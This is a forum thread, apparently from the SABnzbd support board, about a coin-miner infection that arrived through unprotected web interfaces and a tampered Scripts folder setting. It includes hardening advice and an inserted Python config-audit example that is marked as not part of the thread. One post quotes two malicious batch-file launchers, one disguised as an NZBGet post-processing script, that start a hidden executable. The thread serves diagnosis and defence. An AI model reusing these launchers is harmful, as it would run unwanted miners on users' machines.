nzbdwin_beta folder: Malware ... coin miner

Posted: April 11th, 2021, 7:45 am
by crispen8
Hi,

Yesterday I got a warning from Bitdefender referencing a program in the nzbdwin_beta folder which appeared in the SABnzbd complete folder.
Is this legit? Or a virus/trojan etc?
The folder gets recreated after I delete it.
I've googled it with no result, and Malwarebytes scan didn't detect any malware/spyware.

Sincerely,
Lowell

Re: nzbdwin_beta folder

Posted: April 11th, 2021, 8:12 am
by safihre
nzbdwin_beta is not something SABnzbd creates.
Or is this maybe the name of one of your folders in Config > Folders?

Re: nzbdwin_beta folder

Posted: April 11th, 2021, 2:27 pm
by crispen8
Was listed in the Config > Folders > Scripts field.
What is the default for this field?
I didn't change this.

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 12:28 am
by safihre
No, it's not default. You can remove it.
Are you really really sure you didn't set that yourself?

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 7:34 am
by imaxst
I noticed this folder the other day after my CPU usage hit 100%. It was running XMRIG miner. I'm not sure where it came from and I did not run any exe files. I think it must have exploited a post-processing script.

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 7:38 am
by imaxst
From Reddit

So it's a crypto miner; it uses two cron.bat files to have SABnzbd open itself.

@echo off
cd /d %1
start "" "search_indexer.exe" & exit


@echo off
goto start:
########################################
### NZBGET POST-PROCESSING SCRIPT ###
:start
cd /d %NZBPP_DIRECTORY%
start search_indexer.exe
exit /b 93

Re: nzbdwin_beta folder

Posted: April 13th, 2021, 12:58 pm
by safihre
Is your Sabnzbd exposed to the internet without username and password?

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 10:39 am
by imaxst
Not any longer

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 2:12 pm
by sander
imaxst wrote: April 14th, 2021, 10:39 am Not any longer
Clever! ;)

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 2:16 pm
by sander
Oh, everybody: to avoid this in the future:

1) don't have your SAB-webgui unprotected open to Internet: at least put a password on it. Plus: put it on a less well known port, like 49231
2) in SABnzbd, at Unwanted Extensions, fill out EXE, COM, BAT
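A small audit that checks a sabnzbd.ini for the weaknesses this thread turns up (added here as an example; it is not code from the thread or from the SABnzbd project). It assumes the [misc] keys username, password, port, complete_dir, script_dir and unwanted_extensions; the two sample ini texts are constructed, not captured configs.

```python
import configparser
import re

# Constructed sample configs: the weak setup described in the thread, and the
# hardened one sander recommends (password, non-default port, extensions blocked).
WEAK_INI = """\
[misc]
port = 8080
username =
password =
complete_dir = C:\\Downloads\\complete
script_dir = C:\\Downloads\\complete\\nzbdwin_beta
unwanted_extensions =
"""
HARDENED_INI = """\
[misc]
port = 49231
username = lowell
password = a-long-random-passphrase
complete_dir = C:\\Downloads\\complete
script_dir = C:\\SABnzbd\\scripts
unwanted_extensions = exe, com, bat
"""

BLOCK_EXTENSIONS = {"exe", "com", "bat"}       # per sander's advice
KNOWN_BAD_SCRIPT_DIRS = {"nzbdwin_beta"}       # folder name reported in this thread

def _norm(path: str) -> str:
    """Lower-case and use forward slashes so Windows paths compare reliably."""
    return re.sub(r"[\\/]+", "/", path.strip().lower()).rstrip("/")

def audit_sabnzbd_ini(ini_text: str) -> list[str]:
    """Return a list of findings; an empty list means no check fired."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    misc = cfg["misc"] if cfg.has_section("misc") else {}
    findings = []
    if not misc.get("username", "").strip() or not misc.get("password", "").strip():
        findings.append("web interface has no username/password set")
    if misc.get("port", "").strip() == "8080":
        findings.append("web interface on the well-known default port 8080")
    script_dir, complete_dir = _norm(misc.get("script_dir", "")), _norm(misc.get("complete_dir", ""))
    if script_dir and script_dir.rsplit("/", 1)[-1] in KNOWN_BAD_SCRIPT_DIRS:
        findings.append(f"script_dir points at a folder reported as malicious: {script_dir}")
    if script_dir and complete_dir and script_dir.startswith(complete_dir + "/"):
        findings.append("script_dir is inside complete_dir, so downloaded files can become scripts")
    listed = {e.strip().lower().lstrip(".") for e in misc.get("unwanted_extensions", "").split(",") if e.strip()}
    missing = sorted(BLOCK_EXTENSIONS - listed)
    if missing:
        findings.append("unwanted_extensions is missing: " + ", ".join(missing))
    return findings
```

Run it against your own ini with `audit_sabnzbd_ini(open(path).read())`; each finding maps to one of the two steps above or to the Scripts folder setting crispen8 found changed.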

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 14th, 2021, 3:39 pm
by starmanj
I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...

Re: nzbdwin_beta folder: Malware ... coin miner

Posted: April 15th, 2021, 5:00 am
by sander
starmanj wrote: April 14th, 2021, 3:39 pm I'm getting this malware now.
Now that I'm infected, how do I stop the cron process that is repeatedly running? I added username and password so it stopped downloading the stuff...
cron process? That sounds Linux, but the malware is Windows (AFAIK) ... so can you explain?